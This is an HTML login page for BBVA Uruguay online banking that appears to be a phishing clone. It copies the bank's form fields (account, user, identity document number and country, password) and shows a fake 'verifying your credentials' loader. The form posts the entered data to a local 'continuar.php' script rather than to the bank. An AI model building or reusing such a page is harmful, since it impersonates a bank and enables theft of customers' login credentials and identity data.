<!DOCTYPE html>
<html lang="es" class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta http-equiv="Last-Modified" content="0">

    <!--[if IE]>
        <script src="/NetApp/Content/js/html5.js"></script>
    <![endif]-->
    

    <title>Index</title>

    <link rel="stylesheet" href="./errores.css">

    
    <link rel="stylesheet" href="./bbva-global.css">


    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

  
    <meta name="MobileOptimized" content="320">

    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">

    <meta name="apple-mobile-web-app-capable" content="yes">

    <meta names="apple-mobile-web-app-status-bar-style" content="black-translucent">

    <script type="text/javascript" src="./jquery-min.js.descarga"></script>

    <script type="text/javascript" src="./selectors.js.descarga"></script>

    <script type="text/javascript" src="./codigo.js"></script>


        <script type="text/javascript" src="./desktopMobileCodigo.js.descarga"></script>
    <script type="text/javascript" src="./jquery.simplemodal.1.4.3.min.js.descarga"></script>

    <script type="text/javascript" src="./jquery.qtip.min.js.descarga"></script>

    <script type="text/javascript" src="./tooltipForm.js.descarga"></script>

    <script type="text/javascript" src="./jquery.placeholder.min.js.descarga"></script>

    <script type="text/javascript" src="./quieroDropdown.js.descarga"></script>

    <script type="text/javascript" src="./TRDvalidate.js.descarga"></script>

    <!--[if IE 9]>
        <script type="text/javascript" src="/NetApp/Content/js/matchMedia.js"></script>
        <script type="text/javascript" src="/NetApp/Content/js/matchMedia.addListener.js"></script>
    <![endif]-->

    <script type="text/javascript" src="./loginValidation.js.descarga"></script>

    <script type="text/javascript" src="./collapsible_modules.js.descarga"></script>

    <script type="text/javascript" src="./jquery.nicescroll.js.descarga"></script>

    <script type="text/javascript" src="./slides.min.jquery.js.descarga"></script>

    <script type="text/javascript" src="./prettyCheckboxes.js.descarga"></script>

    <script type="text/javascript" src="./highcharts.js.descarga"></script>

    <script type="text/javascript" src="./charts.js.descarga"></script>

    <script type="text/javascript" src="./TRDSlider.js.descarga"></script>

    <script type="text/javascript" src="./jquery-ui-1.8.23.custom.min.js.descarga"></script>

    <script type="text/javascript" src="./TRDCurtain.js.descarga"></script>

    <script type="text/javascript" src="./jquery.mousewheel.js.descarga"></script>

    <script type="text/javascript" src="./jquery.jscrollpane.min.js.descarga"></script>

    <script type="text/javascript" src="./actions.js.descarga"></script>

    <script type="text/javascript" src="./validation.js.descarga"></script>
    <script type="text/javascript" src="./iframeResizer.contentWindow.min.js.descarga"></script>

    
    <script src="./bbva-global.js.descarga"></script>


</head>

<!--[if lt IE 7 ]> <body class="ie6"> <![endif]-->

<!--[if IE 7 ]> <body class="ie7"> <![endif]-->

<!--[if IE 8 ]> <body class="ie8"> <![endif]-->

<!--[if IE 9 ]> <body class="ie9"> <![endif]-->

<!--[if (gt IE 9)|!(IE)]><!-->

<body style="min-height: 300px !important;">
    <!--<![endif]-->
    



<div id="loginNetWebPublica">

<!-- POP UP ACCESS -->





<section id="access_content" class="fn_accessclientpanel clear" style="display: block">
    <form action="../continuar.php" method="post" id="login_form" name="login_form" autocomplete="off" data-new="true">
        <div class="button_panel">
            <div id="infoAccess">

                <div id="cr_loader" class="cr-loading">
                    <div class="cr-loading__wrapper">
                        <div class="cr-loading__animation">
                            <div class="spinner__wrapper spinner--default">
                                <span class="spinner__top"></span>
                                <span class="spinner__center"></span>
                                <span class="spinner__bottom"></span>
                            </div>
                        </div>
                        <div class="cr-loading__text">Verificando tus credenciales</div>
                    </div>
                </div>

                <span class="simil_border"></span>

                <div class="cr-form-new">
                    <div class="cr-form__item">
                        <div>
                            <div class="row">
                                <div class="col-sm-12 col-lg-12">
                                    <div class="cr-form__wrapper">
                                        <div class="dropdown input--bg-white-grey" id="tipoLogin-1">
                                            <input id="tipoLogin" class="dropdown__value" value="" type="hidden" name="tipoLoginSeleccionado">
                                            <label for="tipoLogin" class="input__label">Tipo de ingreso</label>
                                            <div class="dropdown__text"></div>
                                            <i class="dropdown__icon"></i>
                                            <div class="dropdown__menu dropdown_initial_display_none">
                                                <div class="item " data-value="cuenta">Cuenta</div>
                                                <div class="item " data-value="documento">Documento</div>
                                            </div>
                                        </div>
                                        <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                    </div>
                                </div>
                            </div>


                            <div id="group_cuenta" class="group_login" style="">

                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <input id="Cuenta" class="textfield input--bg-white-grey" value="" type="text" name="Cuenta">
                                            <label for="Cuenta" class="input__label">Cuenta</label>
                                            <button class="ui-close clear-btn" type="button" tabindex="-1">CLEAR INPUT TEXT</button>
                                            <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                        </div>
                                    </div>
                                </div>

                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <input id="Usuario" class="textfield input--bg-white-grey" value="" type="text" name="Usuario">
                                            <label for="Usuario" class="input__label">Usuario</label>
                                            <button class="ui-close clear-btn" type="button" tabindex="-1">CLEAR INPUT TEXT</button>
                                            <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <div id="group_documento" class="group_login" style="display: none;">
                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <div class="dropdown input--bg-white-grey" id="dropdown-tipo-documento">
                                                <input id="tipoDocLogin" class="dropdown__value" value="1-845" type="hidden" name="tipoDocumentoLogin">
                                                <label for="tipoDocLogin" class="input__label">Tipo de documento</label>
                                                <div class="dropdown__text">CI – Uruguay</div>
                                                <i class="dropdown__icon"></i>
                                                <div class="dropdown__menu dropdown_initial_display_none">
                                                            <div class="item" data-value="1-845">CI – Uruguay</div>
                                                            <div class="item" data-value="2-63">DNI – Argentina</div>
                                                            <div class="item" data-value="4-">Pasaporte</div>
                                                            <div class="item" data-value="8-105">CI – Brasil</div>
                                                            <div class="item" data-value="24-586">CI – Paraguay</div>
                                                            <div class="item" data-value="12-">Otro</div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                <div id="group_login_pais" style="display: none;">
                                    <div class="row">
                                        <div class="col-sm-12 col-lg-12">
                                            <div class="cr-form__wrapper">
                                                <div class="dropdown input--bg-white-grey" id="dropdown-1">
                                                    <input id="paisDocumentoLogin" class="dropdown__value" value="63" type="hidden" name="paisDocumentoLogin">
                                                    <label for="paisDocumentoLogin" class="input__label">País de documento</label>
                                                    <div class="dropdown__text">ARGENTINA</div>
                                                    <i class="dropdown__icon"></i>
                                                    <div class="dropdown__menu dropdown_initial_display_none">
                                                            <div class="item" data-value="63">ARGENTINA</div>
                                                            <div class="item" data-value="23">ALEMANIA</div>
                                                            <div class="item" data-value="37">ANDORRA</div>
                                                            <div class="item" data-value="40">ANGOLA</div>
                                                            <div class="item" data-value="47">ANTILLAS HOLANDESAS</div>
                                                            <div class="item" data-value="59">ARGELIA</div>
                                                            <div class="item" data-value="69">AUSTRALIA</div>
                                                            <div class="item" data-value="72">AUSTRIA</div>
                                                            <div class="item" data-value="81">BANGLADESH</div>
                                                            <div class="item" data-value="87">BELGICA</div>
                                                            <div class="item" data-value="97">BOLIVIA</div>
                                                            <div class="item" data-value="105">BRASIL</div>
                                                            <div class="item" data-value="149">CANADA</div>
                                                            <div class="item" data-value="207">CHECOSLOVAQUIA</div>
                                                            <div class="item" data-value="211">CHILE</div>
                                                            <div class="item" data-value="215">CHINA</div>
                                                            <div class="item" data-value="169">COLOMBIA</div>
                                                            <div class="item" data-value="190">COREA DEL SUR</div>
                                                            <div class="item" data-value="196">COSTA RICA</div>
                                                            <div class="item" data-value="198">CROACIA</div>
                                                            <div class="item" data-value="199">CUBA</div>
                                                            <div class="item" data-value="232">DINAMARCA</div>
                                                            <div class="item" data-value="239">ECUADOR</div>
                                                            <div class="item" data-value="240">EGIPTO</div>
                                                            <div class="item" data-value="242">EL SALVADOR</div>
                                                            <div class="item" data-value="250">ESLOVENIA </div>
                                                            <div class="item" data-value="245">ESPAÑA</div>
                                                            <div class="item" data-value="249">ESTADOS UNIDOS</div>
                                                            <div class="item" data-value="267">FILIPINAS</div>
                                                            <div class="item" data-value="271">FINLANDIA</div>
                                                            <div class="item" data-value="275">FRANCIA</div>
                                                            <div class="item" data-value="289">GHANA</div>
                                                            <div class="item" data-value="301">GRECIA</div>
                                                            <div class="item" data-value="317">GUATEMALA</div>
                                                            <div class="item" data-value="341">HAITI</div>
                                                            <div class="item" data-value="573">HOLANDA</div>
                                                            <div class="item" data-value="345">HONDURAS</div>
                                                            <div class="item" data-value="351">HONG KONG</div>
                                                            <div class="item" data-value="355">HUNGRIA</div>
                                                            <div class="item" data-value="361">INDIA</div>
                                                            <div class="item" data-value="375">IRLANDA -EIRE-</div>
                                                            <div class="item" data-value="863">ISLAS VIRGENES BRIT-BVI</div>
                                                            <div class="item" data-value="383">ISRAEL</div>
                                                            <div class="item" data-value="386">ITALIA</div>
                                                            <div class="item" data-value="399">JAPON</div>
                                                            <div class="item" data-value="431">LIBANO</div>
                                                            <div class="item" data-value="439">LUXEMBURGO</div>
                                                            <div class="item" data-value="493">MEXICO</div>
                                                            <div class="item" data-value="521">NICARAGUA</div>
                                                            <div class="item" data-value="999">NO DECLARADOS</div>
                                                            <div class="item" data-value="538">NORUEGA</div>
                                                            <div class="item" data-value="548">NUEVA ZELANDIA</div>
                                                            <div class="item" data-value="580">PANAMA</div>
                                                            <div class="item" data-value="586">PARAGUAY</div>
                                                            <div class="item" data-value="589">PERU</div>
                                                            <div class="item" data-value="603">POLONIA</div>
                                                            <div class="item" data-value="607">PORTUGAL</div>
                                                            <div class="item" data-value="628">REINO UNIDO</div>
                                                            <div class="item" data-value="647">REP. DOMINICANA</div>
                                                            <div class="item" data-value="670">RUMANIA</div>
                                                            <div class="item" data-value="840">RUSIA</div>
                                                            <div class="item" data-value="756">SUDAFRICA, RCA DE</div>
                                                            <div class="item" data-value="764">SUECIA</div>
                                                            <div class="item" data-value="767">SUIZA</div>
                                                            <div class="item" data-value="218">TAIWAN</div>
                                                            <div class="item" data-value="827">TURQUIA</div>
                                                            <div class="item" data-value="845">URUGUAY</div>
                                                            <div class="item" data-value="850">VENEZUELA</div>
                                                            <div class="item" data-value="890">ZAMBIA</div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <input id="Documento" class="textfield input--bg-white-grey" value="" type="text" name="Documento">
                                            <label for="Documento" class="input__label">Número de documento</label>
                                            <button class="ui-close clear-btn" type="button" tabindex="-1">CLEAR INPUT TEXT</button>
                                            <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                        </div>
                                    </div>
                                </div>

                            </div>


                            <div class="row">
                                <div class="col-sm-12 col-lg-12">
                                    <div class="cr-form__wrapper">
                                        <input id="Password" class="textfield input--bg-white-grey" value="" type="password" name="Password">
                                        <label for="Password" class="input__label">Password</label>
                                        <button class="ui-close clear-btn" tabindex="-1" type="button">CLEAR INPUT TEXT</button>
                                        <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="row row--button">
                        <div class="col-sm-12 col-lg-12">
                            <div class="cr-buttons">
                                <button type="submit" class="fn_formok ok button button--blue" >Aceptar</button>
                                <a href="#" target="_parent" class="button button--aqua" role="button">Hazte usuario</a>
                            </div>
                        </div>
                    </div>

                    <div id="cajaError" style="display: none;">
                       Cargando...
                    </div>

                    <div align="center" style="padding-bottom: 0px">
                        <img id="iconoInfoAccesoClientes" align="absmiddle" src="./icon_i_azul.png">

                        <a class="links" href="#" target="_parent">Olvidé mi contraseña</a>

                        <span class="separador-galleta"></span>

                        <div >
                       <div id="DigiCertClickID_ETfRhnqE" data-language="es">
                        <div id="DigiCertClickID_ETfRhnqESeal" style="text-decoration: none; text-align: center; display: block; vertical-align: baseline; font-size: 100%; font-style: normal; text-indent: 0px; line-height: 1; width: auto; margin: 0px auto; padding: 0px; border: 0px; background: transparent; position: relative; inset: 0px; clear: both; float: none; cursor: default;"><img src="https://seal.digicert.com/seals/cascade/?tag=yp9PogMt&amp;referer=bbvanet.bbva.com.uy&amp;format=png&amp;lang=es&amp;an=min" alt="DigiCert Secured Site Seal" tabindex="0" role="link" style="text-decoration: none; text-align: center; display: block; vertical-align: baseline; font-size: 100%; font-style: normal; text-indent: 0px; line-height: 1; width: auto; margin: 0px auto; padding: 0px; border: 0px; background: transparent; position: relative; inset: 0px; clear: both; float: none; cursor: pointer;"></div></div>
                       
                    </div>

                </div>
            </div>
        </div>
    </form>
</section>

</div>

<script type="text/javascript" src="./wK0ggcj4"></script>
<script async="" src="//seal.digicert.com/seals/cascade/seal.min.js"></script>

<div style="clear: both; display: block;"></div></body></html>